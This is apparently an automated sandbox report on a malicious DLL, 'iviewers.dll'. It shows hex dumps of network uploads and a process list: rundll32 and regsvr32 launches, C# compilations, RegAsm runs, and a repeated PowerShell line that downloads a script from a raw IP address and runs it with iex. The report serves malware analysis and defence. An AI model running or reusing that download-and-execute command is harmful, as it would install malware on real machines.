                                                          Data Ascii: IE:zVOP_<-)5'N**Asq}+[N +3vq6j5sH/'p_N2n7;lX;hy9Cu'hVt{}2_tm59N[`gViG [[}Kw~y`d35`7MB 6*UkT^2W]!
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: dc 76 3a f6 58 15 fc 15 96 b1 47 22 9a 7d e5 2b 59 ae 8f 56 7f c4 d0 c0 3b 64 af fc f4 8f be c9 c3 28 d8 85 69 fe b8 04 cc 59 6e 37 08 75 3a 2b 4b 44 bc e9 82 ed e6 3d ed 00 8c 1a 57 4f 08 80 d4 e8 f9 bb 1a d2 40 4c 17 98 82 d6 72 e0 21 6e 34 fc 88 5e bd b7 ef 22 5d 0c 04 a2 38 fd 61 74 14 90 b8 83 1b fb c1 b3 ec 07 61 d9 bf 20 86 08 fb 59 7c fe fe 85 a4 f1 ed 23 64 10 bd 32 3b 1f 0b 97 cb dd 40 d9 01 77 d9 30 31 60 97 9d 55 d0 da 8c bf 14 19 5f 8e f5 3a f9 b4 cd 51 7f ce 72 a4 3a e6 e6 24 4f 87 24 2c 25 b4 47 e4 4f 6f 0a 53 83 b0 59 b2 dd a6 33 43 4e 14 15 09 87 7b a2 cf 03 3c c4 3e 2d 85 e5 22 18 00 da d0 61 54 ee 41 8a e8 ab 6a 3f cb 88 5d 23 5c 1d 4f 9c 63 c3 31 d1 3c 02 77 ff 7c 37 fa a3 db 8c fd c3 47 ee 9b f6 48 45 22 e6 59 2e 9e 3b 39 2d 4f 22 10
                                                          Data Ascii: v:XG"}+YV;d(iYn7u:+KD=WO@Lr!n4^"]8ata Y|#d2;@w01`U_:Qr:$O$,%GOoSY3CN{<>-"aTAj?]#\Oc1<w|7GHE"Y.;9-O"
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: 05 51 a6 5d e5 53 1e 9f 2e a1 6d bc 6f a8 fb 44 73 9e 29 2f 9d de 25 4c 66 38 44 06 a3 36 c1 c6 b5 a5 ce 8d 57 ef b9 b7 56 c6 c1 b4 28 b0 bb b0 bd 53 19 f1 07 ff 43 c3 67 f3 01 c1 27 9f 0f bc df 83 46 dc 13 90 32 09 0a 64 f1 d3 dc 20 ed 42 0c f5 15 04 57 ca a9 81 ee 84 33 a0 20 b5 57 13 0a 3a a4 58 20 0a fe c8 f5 c9 9d f4 71 1f 76 de 0f 1a 37 b7 fb a7 f5 e2 53 ce f0 cc bf b3 9b 59 80 ad 2e d2 df e3 b9 b0 d3 57 97 6d 32 9d 79 50 bd d9 ea 35 e9 a2 b2 51 20 9c 10 29 9b 1a 79 8f 6b 47 c7 d1 4f ce fb 26 25 f8 f2 0c 79 57 fc df 12 11 8f 9f 7e b6 f8 a9 00 f9 49 64 2b ff 31 e2 31 70 0c 51 89 4e 7f 33 42 79 7f d0 0e ee 94 61 c8 ce ee 40 5d 3b 1d 8f 22 f1 68 a0 2e 88 d4 8e 59 fb a1 cf cd 00 a2 8b 3c 42 39 d7 74 d4 08 5d 31 70 29 f9 f5 93 a7 ac ac dd 0a 93 7c 98 2d
                                                          Data Ascii: Q]S.moDs)/%Lf8D6WV(SCg'F2d BW3 W:X qv7SY.Wm2yP5Q )ykGO&%yW~Id+11pQN3Bya@];"h.Y<B9t]1p)|-
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: ae 77 63 14 cb b5 a3 4b e3 d1 0a 52 8b bf dc c0 56 fb 69 98 d4 3e b8 14 6e 58 28 e0 71 6f 21 16 30 b1 43 df 5e 94 29 6b 24 5e 5f 2d a0 24 c0 54 6b a3 13 61 3a 7d 68 45 8d 01 68 19 77 68 02 a0 d9 49 6e 6c 5d fe ee bd ee d0 a4 e5 f1 b8 fc 1c bb 94 2b 9f 8b 97 05 43 5a 27 47 c3 4f 2e 3c 7e b7 1b 51 d6 52 7f 69 f4 f3 ad 56 c1 97 a8 cb 05 37 17 56 17 c9 44 e4 c2 ff 1e b5 2c 43 2e 3a f7 6d 31 9a e5 8e 8c 7d 27 7c be fc 39 9b a7 f5 66 34 27 e1 3b 7b 63 34 91 b6 a2 c8 d8 c1 52 f0 20 0e 8f 4d ce 52 82 3f a8 30 d8 bf b8 71 e8 b4 28 38 55 4d cc 3c 73 cf 84 e7 29 c7 fa a1 29 2f 38 99 7a 30 2f 87 6f a1 6d d1 cd 91 fa 66 ab 24 7a 7e f5 15 81 37 59 fc c6 b7 eb 30 33 5a dd 63 cf ab 91 f7 55 b6 88 ec c3 76 1a dc 5f d6 61 54 55 f0 41 a7 4b 0f 89 c4 c5 aa 55 73 4d d8 31 6d
                                                          Data Ascii: wcKRVi>nX(qo!0C^)k$^_-$Tka:}hEhwhInl]+CZ'GO.<~QRiV7VD,C.:m1}'|9f4';{c4R MR?0q(8UM<s))/8z0/omf$z~7Y03ZcUv_aTUAKUsM1m
                                                          2024-12-24 01:18:42 UTC15331OUTData Raw: e6 26 33 53 bf 1e 70 f4 3d bd c6 29 0d 5b 4d 02 4d 8b 37 c5 06 da 5f c2 46 40 1b 81 18 96 c1 51 f4 ed ef a8 74 de 58 d8 af a6 f4 44 21 1f 98 c1 41 65 54 3b 8a fd 38 1b ef 77 cd bc fe e2 b6 ff c9 0b c1 e7 af b4 d9 ab 69 2d be af 9a 85 2e d9 9d c5 1a a5 1b 14 9e 2b 15 7e 30 55 b6 6a f0 56 d3 d6 56 9c 25 ab b9 8f a9 94 ee 7a ed 94 76 9b 94 c3 79 29 3e 53 52 60 d0 72 5b 62 8c c3 87 3d d1 74 9f e5 5d e1 41 ef 16 b6 20 ec 55 76 8c 16 cd 58 f4 7e 6d d1 d2 ab 74 f3 63 43 83 e8 d6 69 39 c4 b9 48 ea 2a ef c0 8a 14 65 1c 47 4b 35 2e da 2c ce dd 28 f8 16 90 42 d1 e7 dc 7f d1 ec 91 2f f7 fc 7d ca d6 6d 76 ce e8 87 72 51 ae d7 ed 72 9b 3a 69 eb b3 36 66 ef e9 37 4b e7 6f 37 bf 7b f5 36 74 fa 51 4e fb 4a 88 e0 22 b3 2d 6b bf 65 ae 94 42 c5 15 21 72 b9 8d 38 f7 0d e2 c8
                                                          Data Ascii: &3Sp=)[MM7_F@QtXD!AeT;8wi-.+~0UjVV%zvy)>SR`r[b=t]A UvX~mtcCi9H*eGK5.,(B/}mvrQr:i6f7Ko7{6tQNJ"-keB!r8
                                                          2024-12-24 01:18:44 UTC1129INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=u7l8hfgqbu3b3g86hlspjulogf; expires=Fri, 18 Apr 2025 19:05:23 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hKPcyz29cvgA7gmWfVc2KN1c3A1b6wSICFgMrbqLNY3TugSYH2h5ntgA80UajXayrkFAHEEeeWQqZMf4%2BsA19rUvz2hM%2FEXiK96OQ8XmufmLxnU0DzOV5Pyf%2Fnab35h1cR8M"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc249ba5b1881-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1590&rtt_var=684&sent=335&recv=614&lost=0&retrans=0&sent_bytes=2839&recv_bytes=591708&delivery_rate=1836477&cwnd=238&unsent_bytes=0&cid=8fa585cdb07294d3&ts=2277&x=0"


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\loaddll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\iviewers.dll"
                                                          Imagebase:0xfc0000
                                                          File size:126'464 bytes
                                                          MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
                                                          Imagebase:0xa40000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
                                                          Imagebase:0xc00000
                                                          File size:20'992 bytes
                                                          MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
                                                          Imagebase:0x490000
                                                          File size:61'440 bytes
                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:20:18:02
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
                                                          Imagebase:0x490000
                                                          File size:61'440 bytes
                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:20:18:08
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:20:18:08
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES61E6.tmp" "c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES63AB.tmp" "c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
                                                          Imagebase:0x870000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:20:18:09
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:15
                                                          Start time:20:18:11
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
                                                          Imagebase:0x870000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:20:18:11
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:20:18:11
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:20:18:11
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:20:18:11
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C65.tmp" "c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:20:18:12
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
                                                          Imagebase:0x870000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:20:18:12
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:20:18:15
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:23
                                                          Start time:20:18:15
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7946.tmp" "c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:24
                                                          Start time:20:18:15
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:25
                                                          Start time:20:18:15
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:26
                                                          Start time:20:18:16
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7C53.tmp" "c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:27
                                                          Start time:20:18:16
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
                                                          Imagebase:0x870000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:28
                                                          Start time:20:18:16
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7CE0.tmp" "c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP"
                                                          Imagebase:0xe70000
                                                          File size:46'832 bytes
                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:29
                                                          Start time:20:18:16
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:30
                                                          Start time:20:18:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x3b0000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:31
                                                          Start time:20:18:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x5b0000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:32
                                                          Start time:20:18:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                          Imagebase:0x480000
                                                          File size:65'440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:33
                                                          Start time:20:18:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline"
                                                          Imagebase:0xb10000
                                                          File size:2'141'552 bytes
                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:34
                                                          Start time:20:18:17
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):true
